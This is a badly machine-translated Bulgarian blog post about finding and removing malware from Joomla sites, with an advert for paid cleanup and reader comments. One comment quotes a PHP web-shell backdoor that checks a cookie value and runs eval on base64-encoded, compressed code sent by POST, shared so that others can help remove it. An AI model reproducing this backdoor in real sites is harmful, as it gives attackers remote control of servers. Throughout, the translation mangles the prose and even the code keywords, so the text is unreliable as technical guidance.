Jumla сканиране за вируси

Как да се провери за вируса онлайн?

В моя случай, е известно, че Yandex Google и да намерят "Сайтът може да застраши сигурността на вашия компютър или мобилно устройство."

Стъпка 1: Промяна на пароли.

Паролите трябва да се сменят и FTP и администратор Joomla. Това ние нарязани веднъж на 2 възможни източници на заплахи. Вирус на друг компютър и троянците в администраторския браузъра.

Стъпка 2. скриптове в PHP, за да сканирате за вируси.

В Интернет можете да намерите редица опции вече достатъчно трудно с подписите на троянски коне. Аз предпочитам да използвате samopisnaya скрипт. Поради своята простота, тя позволява да се обработват голям брой файлове и не трябва да се притеснявате, че може да не е достатъчно време за изпълнение. И ако е така, тогава можете да не се изпълнява винаги в основата и proskanit какво определена папка, където файловете по-малък. Script рекурсивно и всички подпапки.

Защо в Joomla в / снимки / банери / е Скриптът? Сценарият на едно и също име интернет не е намерен, т.е. то не е свързано с Jumla или неговите плъгини. В каталога само снимки. Радвайки се на тялото скрипт, част от него е криптирана. Бинго!

В моя скрипт, за почистване има прост малко функция patch_f. Карам в параметрите напълно зловреден код и устройства на заразените файлове.

Доклад в Google и Yandex вируси премахнати от сайта.

Това е най-лесният стъпка. Вие трябва да отидете на Google Webmaster и Yandex Webmaster. Ако даден сайт не е регистрирана там, а след това да го добавите. В Yandex Webmaster отидете в раздел "Сигурност" и да го изпратите за допълнителен преглед. Обикновено това отнема до една седмица. С последния сайта Yandex успя на втория ден.
В Google Webmaster - в раздел "Статус - Злонамерени програми", а също и да го изпратите за преглед. Google се справя по-светъл и обикновено в рамките на 2-3 дни. С последния сайта на правото в един и същи ден.

Joomla търсене и изтриване на вируси (Част 2)

Можете да се свържете с мен за помощ в сайта на лечение.
Цената на цялата 800 рубли.
Работата се 1,5 - 2 часа.

Вие получавате:
- търсене и премахване на вируси и зловреден код

- отстраняване на уязвимостта

- 6 месеца гаранция

Уважаеми, вие имате много неоптимизиран сценарий - ако погледнете, например, зловредния код на всички файлове без маска на евтин хостинг, вие или ще надвишава или max_execution_time общежитие забранен за превишаване на мишката ...
По-добре е да не се използва array_flat функция (), и определя резултата веднага в поддиректории функция getFilesFromDir () цикъл, и на гишето рекурсия 10,000 файлове вече надминава ...

В първата версия на сценария е написан за себе си, аз не се нуждаят от нея, за да се оптимизира
Вторият проблем с неговото изпълнение все още не са настъпили, въпреки че тя е била използвана за евтин споделен хостинг
Трети Ако имате проблеми, може просто да стартирате скрипта не е в основата, а в определена папка.

Вие се опитвате да спестите от мачове.

Ако някой може да помогне, зловредният софтуер вътре PHP-скрипт, аз направих това:
ако (! празен ($ _ COOKIE [ '__ utma']) и SUBSTR ($ _ COOKIE [ '__ utma'], 0,16) == "3469825000034634"), ако (! празен ($ _ POST [ 'съобщ']) и $ съобщ = @ gzinflate (@ base64_decode (@str_replace ( '', », urldecode ($ _ POST [ 'съоб']))))) ехо»;
Оценка ($ MSG);
ехо "бг";
изход;
>>

Да, това е често срещана грешка. Чисто JS vse.A и след известно време всичко се връща към нормалното.